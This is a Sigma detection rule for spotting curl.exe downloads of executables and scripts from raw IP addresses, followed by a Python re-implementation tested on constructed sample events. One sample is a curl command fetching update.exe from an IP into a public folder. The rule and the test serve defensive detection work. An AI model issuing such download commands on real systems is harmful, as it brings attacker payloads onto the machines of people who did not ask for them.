Suspicious File Download From IP Via Curl.EXE
Detects potentially suspicious file downloads directly from IP addresses using curl.exe
Sigma rule
title: Suspicious File Download From IP Via Curl.EXE
id: 5cb299fc-5fb1-4d07-b989-0644c68b6043
status: test
description: Detects potentially suspicious file downloads directly from IP addresses using curl.exe
references:
    - https://labs.withsecure.com/publications/fin7-target-veeam-servers
    - https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv
    - https://github.com/pr0xylife/IcedID/blob/8dd1e218460db4f750d955b4c65b2f918a1db906/icedID_09.28.2023.txt
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-07-27
tags:
    - attack.execution
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\curl.exe'
        - OriginalFileName: 'curl.exe'
    selection_ip:
        CommandLine|re: '://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'
    selection_http:
        CommandLine|contains: 'http'
    selection_flag:
        CommandLine|contains:
            - ' -O' # covers the alias for --remote-name and --output
            - '--remote-name'
            - '--output'
    selection_ext:
        # Note: If you add more extensions please consider adding them also in 9cc85849-3b02-4cb5-b371-3a1ff54f2218
        CommandLine|endswith:
            - '.bat'
            - '.bat"'
            - '.dat'
            - '.dat"'
            - '.dll'
            - '.dll"'
            - '.exe'
            - '.exe"'
            - '.gif'
            - '.gif"'
            - '.hta'
            - '.hta"'
            - '.jpeg'
            - '.jpeg"'
            - '.log'
            - '.log"'
            - '.msi'
            - '.msi"'
            - '.png'
            - '.png"'
            - '.ps1'
            - '.ps1"'
            - '.psm1'
            - '.psm1"'
            - '.vbe'
            - '.vbe"'
            - '.vbs'
            - '.vbs"'
            - ".bat'"
            - ".dat'"
            - ".dll'"
            - ".exe'"
            - ".gif'"
            - ".hta'"
            - ".jpeg'"
            - ".log'"
            - ".msi'"
            - ".png'"
            - ".ps1'"
            - ".psm1'"
            - ".vbe'"
            - ".vbs'"
    condition: all of selection_*
falsepositives:
    - Unknown
level: high
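To see how the five selections combine, here is the rule's detection logic re-implemented as plain Python and run over constructed process_creation events. This is an added example, not code from the Sigma rule or the SigmaHQ project; the event field names (Image, OriginalFileName, CommandLine) follow the rule, and the sample command lines and the test-net IP addresses are constructed.

```python
import re

# Sigma's contains/endswith modifiers match case-insensitively, while |re is
# case-sensitive; the helpers below mirror that. Field names follow the rule.
# Sample events are constructed, not taken from a real host.
IP_URL_RE = re.compile(r"://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}")
# ' -O' compared case-insensitively also covers ' -o', the --output alias.
OUTPUT_FLAGS = (" -o", "--remote-name", "--output")
EXTENSIONS = (".bat", ".dat", ".dll", ".exe", ".gif", ".hta", ".jpeg", ".log",
              ".msi", ".png", ".ps1", ".psm1", ".vbe", ".vbs")
# The rule lists each extension bare and with a trailing " or ' quote.
EXT_SUFFIXES = tuple(e + q for e in EXTENSIONS for q in ("", '"', "'"))

def is_curl(event):
    """selection_img: Image ends with \\curl.exe or OriginalFileName is curl.exe."""
    image = event.get("Image", "").lower()
    original = event.get("OriginalFileName", "").lower()
    return image.endswith("\\curl.exe") or original == "curl.exe"

def matches(event):
    """condition: all of selection_* (img, ip, http, flag, ext)."""
    cmd = event.get("CommandLine", "")
    lc = cmd.lower()
    return (is_curl(event)
            and IP_URL_RE.search(cmd) is not None
            and "http" in lc
            and any(flag in lc for flag in OUTPUT_FLAGS)
            and lc.endswith(EXT_SUFFIXES))

def triage(events):
    return [e["CommandLine"] for e in events if matches(e)]

# Constructed events; 203.0.113.0/24 and 192.0.2.0/24 are documentation ranges.
CURL = "C:\\Windows\\System32\\curl.exe"
SAMPLE_EVENTS = [
    {"Image": CURL, "OriginalFileName": "curl.exe",   # IP, -o, .exe": fires
     "CommandLine": 'curl.exe http://203.0.113.10/update.exe -o "C:\\Users\\Public\\update.exe"'},
    {"Image": CURL, "OriginalFileName": "curl.exe",   # hostname and .html: no
     "CommandLine": "curl.exe -s https://example.com/index.html -o page.html"},
    {"Image": CURL, "OriginalFileName": "curl.exe",   # IP but no flag/extension
     "CommandLine": "curl.exe https://192.0.2.5/api/status"},
    {"Image": "C:\\Tools\\wget.exe", "OriginalFileName": "wget.exe",  # not curl
     "CommandLine": "wget.exe http://192.0.2.5/a.exe -O a.exe"},
]

if __name__ == "__main__":
    for line in triage(SAMPLE_EVENTS):
        print("ALERT:", line)
```

Only the first event satisfies every selection; the other three each fail exactly one of them, which is the behaviour the `all of selection_*` condition encodes.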